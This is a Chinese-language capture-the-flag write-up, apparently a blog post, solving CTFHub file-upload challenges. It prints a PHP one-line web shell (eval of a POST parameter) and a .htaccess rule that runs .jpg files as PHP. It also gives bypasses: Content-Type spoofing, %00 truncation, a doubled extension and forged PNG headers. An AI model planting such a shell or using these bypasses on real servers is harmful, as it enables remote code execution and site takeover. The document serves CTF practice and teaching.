无验证
[huayang]Flag
我们在本地新建个文件随便起个名字
写如下列代码
<?php
@eval(@$_POST['g']);
?>
这就是大名鼎鼎的一句话木马
现在我们上传
上传成功我们来到蚁剑
步骤
网址一定要写上传文件的具体地址
密码就是我们代码里的g
双击打开
点击html在打开这个文件flag就出来啦
前端验证
Flag
既然说验证我们先上传两个个文件看看
很明显是绕过
上传png文件用burp改后缀
再用蚁剑就可以看见flag了
.htaccess
Flag
既然都说了.htaccess
创建一个.htaccess文件写如下列代码
AddType application/x-httpd-php .jpg
意思就是把上传的jpg文件以php格式运行
当然也可以改为png文件
接着先上传.htaccess文件
成功后再上传有一句话的.jpg文件
然后用蚁剑用同样的方法即可找到flag
MIME绕过
Flag
想直接点的可通过前端验证的方法拿到flag
咱们跟着过程走
咱们先上传一个php文件抓包来看看
可以看见是同通过Content-Type来验证的
咱么再上传一个jpg的文件看看有什么变化
所以我们只需要把上面的验证改成这个就可以了
像这样
点击发送
后面的不用我说了吧
00截断
Flag
日常抓包
把文件名改为xx.php.jpg
然后再post后面加上1.php%00就行了
后面的又不用我说了吧
地址还是:http://challenge-8e1df66dafc60e23.sandbox.ctfhub.com:10080/upload/1.php
双写后缀
Flag
老方法试探一下
太简单了吧。。。
很明显是过滤php,写成这样就(从过滤是左到右)把中间的PHP过滤了剩下’p’与’hp’组合起来刚好是php
然后重复上面的方法找到flag
文件头检查
Flag
1.写入一句话
2.改成图片文件(这里演示的是png)
3.使用winhex工具更改文件PNG的16进制文件头是89504E47
这里记得要按ins键到右边的样子
4.上传抓包
5.改后缀发送
6.同上
完![/huayang]
FROM:浅浅淡淡[hellohy]
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论